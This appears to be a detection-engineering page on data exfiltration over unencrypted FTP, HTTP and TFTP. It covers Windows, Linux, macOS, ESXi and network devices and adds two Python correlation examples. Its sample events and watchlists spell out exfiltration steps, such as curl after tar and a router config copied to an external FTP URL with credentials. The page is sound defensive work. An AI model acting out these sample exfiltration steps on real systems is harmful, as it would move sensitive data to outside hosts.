Detects data access or staging events followed by outbound data flows using unencrypted protocols (e.g., FTP, HTTP) initiated by unexpected processes or to rare destinations.

| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |

| Field | Description |
|---|---|
| UnencryptedProtocolList | Set of protocols considered suspicious for outbound data exfiltration (e.g., FTP, HTTP). |
| DataTransferSizeThreshold | Defines what amount of outbound data is considered abnormal for a host/user. |
| ParentProcessDenylist | Processes that should not launch FTP/HTTP clients (e.g., winword.exe launching ftp.exe). |
Detects sensitive file access or the execution of compression utilities followed, within a short window, by outbound connections over unencrypted protocols from curl, wget, ftp, or custom binaries.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Network Connection Creation (DC0082) | auditd:SYSCALL | connect |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |
| Network Traffic Flow (DC0078) | NSM:Flow | flow records |

| Field | Description |
|---|---|
| SensitiveDirectoryWatchlist | Flag access to paths known to store sensitive or regulated data. |
| ProcessBaseline | Define which binaries are allowed to communicate externally using HTTP/FTP. |
| TimeWindow | Correlates process/file/network within a defined time window. |
Detects abnormal outbound HTTP/FTP connections by local scripts or binaries outside standard browser activity, following access to local documents or user data.

| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | macos:osquery | socket_events |
| Process Creation (DC0032) | macos:osquery | process_events |
| File Access (DC0055) | macos:unifiedlog | log stream - file subsystem |
| Network Traffic Content (DC0085) | NSM:Flow | http.log, ftp.log |

| Field | Description |
|---|---|
| ScriptedClientAllowlist | Defines allowed automated agents that may transmit HTTP or FTP data (e.g., backup tools). |
| PayloadInspectionKeywordList | Terms or patterns indicating structured or sensitive data leaving via HTTP/FTP. |
Detects shell-based scripts accessing configuration files or snapshots and transmitting them over unencrypted protocols such as FTP or HTTP to non-management IPs.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | esxi:hostd | event stream |
| Network Traffic Flow (DC0078) | NSM:Flow | flow records |
| Network Traffic Content (DC0085) | NSM:Flow | http.log |

| Field | Description |
|---|---|
| VMConfigAccessPathWatchlist | Locations of VMX/CFG/SNAPSHOT files that should not be accessed by non-admin shells. |
| OutboundProtocolProfile | Expected network protocols for guest and host interfaces. |
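The Windows, Linux, macOS and ESXi analytics above all have the same shape: a data-access or staging event, then within a time window an outbound connection on a cleartext port from a process that is either not baselined for that protocol or was launched by a denylisted parent, with a rare destination raising severity. The block below is an added example, not code from the original page, that runs that correlation over a constructed event stream. The event records are assumed to be Sysmon EventCode 1/3, Security 4663 and auditd execve/connect records after normalisation (osquery process_events/socket_events and hostd events normalise into the same shape); the tunable names follow the field tables, and every concrete value (ports, lists, paths, hosts, addresses) is an assumption made for the example.

```python
"""Staging-then-cleartext-egress correlation over normalised endpoint events.

Added example (not from the original page): the tunables mirror the field tables,
the events are constructed, and every value below is an illustrative assumption.
"""
from dataclasses import dataclass

# Tunables named after the page's fields; the concrete values are assumptions.
UNENCRYPTED_PROTOCOL_LIST = {21: "ftp", 69: "tftp", 80: "http"}  # keyed by destination port
TIME_WINDOW = 300.0                                              # seconds of look-back
PROCESS_BASELINE = {"chrome.exe", "msedge.exe", "firefox", "backup-agent"}  # may use HTTP/FTP
PARENT_PROCESS_DENYLIST = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
STAGING_UTILITIES = {"7z.exe", "rar.exe", "makecab.exe", "tar", "zip", "gzip"}
SENSITIVE_DIRECTORY_WATCHLIST = ("C:\\Finance\\", "/srv/customer_db/", "/etc/")
KNOWN_DESTINATIONS = {"93.184.216.34"}  # stand-in for a 30-day per-host destination baseline


@dataclass
class Event:
    kind: str          # "file" (4663 / auditd open), "process" (Sysmon 1 / execve), "netconn" (Sysmon 3 / connect)
    ts: float          # epoch seconds
    host: str
    image: str         # process that performed the action
    pid: int = 0
    parent: str = ""   # process events only
    path: str = ""     # file events only
    dst_ip: str = ""   # netconn events only
    dst_port: int = 0


def is_staging(e: Event) -> bool:
    """A read under a watched path or an archiver launch counts as data access/staging."""
    if e.kind == "file":
        return e.path.startswith(SENSITIVE_DIRECTORY_WATCHLIST)
    return e.kind == "process" and e.image in STAGING_UTILITIES


def correlate(events: list) -> list:
    """Return one finding per cleartext connection that follows staging on the same host.

    A finding needs (1) a staging event within TIME_WINDOW before the connection and
    (2) a connecting image outside PROCESS_BASELINE or a parent on the denylist.
    A rare destination is recorded as an extra reason but is not sufficient on its own.
    """
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for i, conn in enumerate(events):
        if conn.kind != "netconn" or conn.dst_port not in UNENCRYPTED_PROTOCOL_LIST:
            continue
        proto = UNENCRYPTED_PROTOCOL_LIST[conn.dst_port]
        prior = [p for p in events[:i] if p.host == conn.host and conn.ts - p.ts <= TIME_WINDOW]
        staged = [p for p in prior if is_staging(p)]
        if not staged:
            continue
        reasons = [f"preceded by {staged[-1].kind} event: {staged[-1].path or staged[-1].image}"]
        # Recover the parent from the process-creation event with the same pid (Sysmon ProcessId /
        # auditd pid); matching on image name alone would be fooled by a renamed binary.
        launches = [p for p in prior if p.kind == "process" and p.pid == conn.pid]
        parent = launches[-1].parent if launches else ""
        if parent in PARENT_PROCESS_DENYLIST:
            reasons.append(f"launched by denylisted parent {parent}")
        if conn.image not in PROCESS_BASELINE:
            reasons.append(f"{conn.image} is not baselined for outbound {proto}")
        if len(reasons) == 1:
            continue  # baselined client with an ordinary parent, e.g. a browser fetching a page
        if conn.dst_ip not in KNOWN_DESTINATIONS:
            reasons.append(f"rare destination {conn.dst_ip}")
        findings.append({"host": conn.host, "image": conn.image, "protocol": proto,
                         "dst": f"{conn.dst_ip}:{conn.dst_port}", "reasons": reasons})
    return findings


# Constructed sample stream: Word-spawned ftp.exe on WS01, tar+curl on a Linux host,
# a baselined browser on WS02 that must not fire, and an ftp.exe with no staging on WS03.
SAMPLE_EVENTS = [
    Event("file", 1000, "WS01", "winword.exe", pid=3100, path="C:\\Finance\\payroll.xlsx"),
    Event("process", 1010, "WS01", "ftp.exe", pid=4412, parent="winword.exe"),
    Event("netconn", 1015, "WS01", "ftp.exe", pid=4412, dst_ip="203.0.113.10", dst_port=21),
    Event("process", 2000, "srv-db", "tar", pid=7001, parent="bash"),
    Event("file", 2001, "srv-db", "tar", pid=7001, path="/srv/customer_db/customers.sql"),
    Event("process", 2030, "srv-db", "curl", pid=7002, parent="bash"),
    Event("netconn", 2031, "srv-db", "curl", pid=7002, dst_ip="198.51.100.7", dst_port=80),
    Event("file", 3000, "WS02", "excel.exe", pid=500, path="C:\\Finance\\budget.xlsx"),
    Event("process", 3001, "WS02", "chrome.exe", pid=900, parent="explorer.exe"),
    Event("netconn", 3005, "WS02", "chrome.exe", pid=900, dst_ip="93.184.216.34", dst_port=80),
    Event("netconn", 9000, "WS03", "ftp.exe", pid=55, dst_ip="203.0.113.10", dst_port=21),
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Two design points carry over to a real deployment: the parent lookup joins on pid rather than image name, because Sysmon EventCode 3 does not carry the parent and a renamed client binary would otherwise evade the denylist; and the WS03 connection is deliberately not alerted on, since a cleartext FTP session with no prior staging in the window is the noisy case that the TimeWindow and SensitiveDirectoryWatchlist tunables exist to suppress. Port-based protocol identification is a stand-in for the NSM http.log/ftp.log content, which should be preferred where available.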
Detects use of unencrypted protocols (e.g., TFTP, FTP, HTTP) to transfer configuration files, routing tables, or logs to untrusted IP addresses, especially using administrative commands like `copy run ftp:`.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | networkdevice:cli | CLI command logs |
| Network Traffic Flow (DC0078) | networkdevice:syslog | flow records |
| Network Traffic Content (DC0085) | NSM:Flow | PCAP inspection |

| Field | Description |
|---|---|
| ProtocolCommandWatchlist | Flag commands like `copy`, `archive tar`, or `upload` directed at external hosts. |
| DestinationIPBlocklist | Define external IP ranges unauthorized to receive router/switch configs. |
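For the network-device analytic the decisive data is the command log itself: the scheme in the URL tells you whether the transfer is cleartext, and the authority tells you where the config went. The block below is an added example, not code from the original page, that applies the ProtocolCommandWatchlist and DestinationIPBlocklist logic to constructed command-log lines. The line format imitates Cisco IOS `%PARSER-5-CFGLOG_LOGGEDCMD` command logging, and the address ranges, hostnames and the authorised-destination list are assumptions made for the example. It also handles the `copy run ftp:` form, where IOS prompts for the address interactively so the destination never appears in the command log.

```python
"""Cleartext config-transfer detection over network-device CLI command logs.

Added example (not from the original page): log lines are constructed in the style of
Cisco IOS "%PARSER-5-CFGLOG_LOGGEDCMD" records; ranges and names are assumptions.
"""
import ipaddress
import re

# Tunables named after the page's fields; values are illustrative assumptions.
PROTOCOL_COMMAND_WATCHLIST = ("copy", "archive tar", "upload")
UNENCRYPTED_SCHEMES = {"ftp", "tftp", "http"}
AUTHORISED_DESTINATIONS = [ipaddress.ip_network("10.0.0.0/24")]      # config-backup server's mgmt net
DESTINATION_IP_BLOCKLIST = [ipaddress.ip_network("203.0.113.0/24")]  # must never receive configs

CMD_RE = re.compile(r"logged command:\s*(?P<cmd>.+?)\s*$")
URL_RE = re.compile(r"\b(?P<scheme>[a-z]+)://(?P<authority>[^/\s]+)")
BARE_SCHEME_RE = re.compile(r"\b(?P<scheme>ftp|tftp|http):(?!//)")


def destination_status(authority: str) -> str:
    """Classify a URL authority: authorised, blocklisted, untrusted, or unresolved (a hostname)."""
    host = authority.rsplit("@", 1)[-1].split(":")[0]  # strip user:pass@ and :port
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unresolved"  # a name cannot be checked offline; treat it as untrusted
    if any(ip in net for net in DESTINATION_IP_BLOCKLIST):
        return "blocklisted"
    if any(ip in net for net in AUTHORISED_DESTINATIONS):
        return "authorised"
    return "untrusted"


def analyse_line(line: str):
    """Return a finding for a watched command that pushes data over a cleartext scheme, else None."""
    m = CMD_RE.search(line)
    if m is None:
        return None
    cmd = m.group("cmd")
    if not cmd.startswith(PROTOCOL_COMMAND_WATCHLIST):
        return None
    url = URL_RE.search(cmd)
    if url is None:
        # "copy run ftp:" without a URL: the address is prompted for interactively and never
        # reaches the command log, so the destination must come from flow records or PCAP.
        bare = BARE_SCHEME_RE.search(cmd)
        if bare is None:
            return None
        return {"cmd": cmd, "scheme": bare.group("scheme"), "status": "interactive",
                "severity": "medium", "credentials_in_url": False}
    scheme = url.group("scheme")
    if scheme not in UNENCRYPTED_SCHEMES:
        return None  # scp/sftp/https: encrypted transfer, outside this analytic
    status = destination_status(url.group("authority"))
    if status == "authorised":
        return None
    return {"cmd": cmd, "scheme": scheme, "status": status,
            "severity": "high" if status in ("blocklisted", "untrusted") else "medium",
            # an ftp://user:pass@host URL also exposes the credentials on the wire and in this log
            "credentials_in_url": "@" in url.group("authority")}


def analyse_log(lines) -> list:
    return [f for f in map(analyse_line, lines) if f is not None]


# Constructed command-log lines (not captured from a real device).
SAMPLE_LOG = [
    "core-rtr1 201: *Jan 10 03:12:43.911: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:copy running-config tftp://10.0.0.5/core-rtr1.cfg",
    "core-rtr1 202: *Jan 10 03:40:02.117: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy running-config ftp://backup:s3cret@203.0.113.5/core-rtr1.cfg",
    "core-rtr1 203: *Jan 10 03:41:19.540: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:archive tar /create ftp://198.51.100.20/flash.tar flash:",
    "core-rtr1 204: *Jan 10 04:02:55.003: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:copy running-config scp://10.0.0.5/core-rtr1.cfg",
    "core-rtr1 205: *Jan 10 04:10:31.774: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy run ftp:",
    "core-rtr1 206: *Jan 10 04:11:08.290: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:show running-config",
    "core-rtr1 207: *Jan 10 04:15:44.611: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy startup-config http://files.example.net/upload",
]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```

The scheduled tftp push to the backup server on the management net and the scp transfer produce nothing; the ftp push to a blocklisted address, the archive to an unlisted address, the interactive `copy run ftp:` and the http upload to a hostname each produce a finding. A URL with embedded credentials is worth flagging separately, since the same log line that records the exfiltration also records a valid backup-server password in cleartext.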